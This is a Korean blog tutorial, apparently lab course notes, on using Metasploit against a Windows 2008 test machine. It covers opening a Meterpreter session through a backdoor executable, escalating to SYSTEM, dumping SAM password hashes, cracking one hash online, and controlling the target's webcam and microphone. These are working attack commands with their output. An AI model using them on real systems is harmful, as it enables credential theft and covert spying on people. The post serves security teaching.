본문 바로가기

Learning/└◆Metasploit

metasploit 12. password the hash(hash dump)

[실습] password the hash(hash dump)

<!--[if !supportEmptyParas]--> <!--[endif]-->

사용시스템

- KaliLinux

- windows 2008

<!--[if !supportEmptyParas]--> <!--[endif]-->

(windows 2008)

<!--[if !supportEmptyParas]--> <!--[endif]-->

(선수작업) 윈도우 2008 사용자

(EX: soldesk)의 암호를 쉬운 암호로 변경한다.


(기존 암호)  ==> (새로운 암호) 123

시작 > 관리도구 > 로컬 보안 정책

보안 설정 > 계정 정책 > 암호 정책 >

"암호는 복잡성을 만족해야 함" 부분이 "사용 안 함"으로 설정 되어 있는지 확인

<!--[if !supportEmptyParas]-->

 <!--[endif]-->


시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 >

soldesk 사용자를 선택하고 오른쪽 마우스를 클릭

암호 설정 > 계속 > 새암호(EX: 123)



(KaliLinux)

# netstat -an | grep :5432

# service postgresql start

# cd /root/bin ; msfconsole -r reverse_resource2.rc

msf > sessions -l

msf > sessions -i 1

meterpreter >


(Windows2008)

바탕화면에 backdoor.exe 파일 실행

<!--[if !supportEmptyParas]--> <!--[endif]-->

패스워드 해시 덤프(password hash dump)

meterpreter > help

..... (중략) .....

Priv: Password database Commands

================================

<!--[if !supportEmptyParas]--> <!--[endif]-->

Command Description

------- -----------

hashdump Dumps the contents of the SAM database

..... (중략) .....

<!--[if !supportEmptyParas]--> <!--[endif]-->

meterpreter > getuid

Server username: soldesk-PC\soldesk

meterpreter > getsystem

...got system (via technique 1).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM <--관리자 권한 실행 모드

Win Logon 으로 마이그레이션 되어 있는 권한이 가장 높은 권한(Windows)

meterpreter > run hashdump

[*] Obtaining the boot key...

[*] Calculating the hboot key using SYSKEY fc7bdca7a24bf26b95d5b3485ad7469f...

[*] Obtaining the user list and keys...

[*] Decrypting user keys...

[*] Dumping password hints...

<!--[if !supportEmptyParas]--> <!--[endif]-->

soldesk:"soldesk1."

<!--[if !supportEmptyParas]--> <!--[endif]-->

[*] Dumping password hashes...

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

soldesk:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::

해쉬 알고리즘 : 어떠한 글자 수 라도 일정한 길이의 암호화 키를 가짐/복호화 불가능

<!--[if !supportEmptyParas]-->

 <!--[endif]-->

meterpreter > exit

[*] Shutting down Meterpreter...

<!--[if !supportEmptyParas]--> <!--[endif]-->

[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit

msf exploit(handler) > exit


패스워드 크랙

SAM 파일로 부터 추출된 패스워드 해시를 크랙하는 대표적인 툴

- 존더리퍼(John The Ripper), pwdump, rainbow crack

실습에서는 NTLM/LM 해시를 복호화는 MD5Decrypter.co.uk(http://www.md5decrypter.co.uk) 사이트를 사용한다.

<!--[if !supportEmptyParas]--> <!--[endif]-->

웹 브라우저를 실행하고 다음 사이트로 이동한다.

http://www.md5decrypter.co.uk (http://www.hashkiller.co.uk/)

-> 상단에 "Decrypter/Cracker" 선택

-> "NTLM Decrypter" 선택


<!--[if !supportEmptyParas]-->

 <!--[endif]-->

3dbde697d71690a769204beb12283678 -> 123

복잡한 패스워드는 온라인 데이터베이스에는 없는 해시를 생성한다

따라서 이런경우에는 레인보우 테이블 기반 크랙 도구를 사용하는 것을 고려해야 한다.

http://www.md5decrypter.co.uk 사이트는 아주 많은 해시 데이터베이스를 가지고 일치하는 패스워드를 찾는다

이 방법은 간단하고 취약한 패스워드를 크랙하는데 매우 효과적이고 빠른 기법이다.


레인보우 테이블 : 암호화된 문자의 경우의수를 DB로 미리 만들어 놓은 파일

레인보우 크랙 : 미리 만들어져 있는 레인보우 테이블과 위에서 얻은 암호화 키를 비교작업

 

[추가적인 실습]


웹캠제어

노트북에 장착이 되어 있는 웹캠 디바이스를 칼리 리눅스에서 제어해 보자.

사용하는 명령어는 다음과 같다.

webcam_list 설치돼 있는 웹캠의 정보를 가져온다.

webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다.

webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다.

webcam_stop 웹캠의 실행을 중지한다.

webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다.

 

다른 장치(기기)에 대해서도 위험성에 대해 논의한다.

- 스마트 TV

- 핸드폰

- 건물내 감시카메라

사물인터넷과의 연계성에 대해서 논의한다.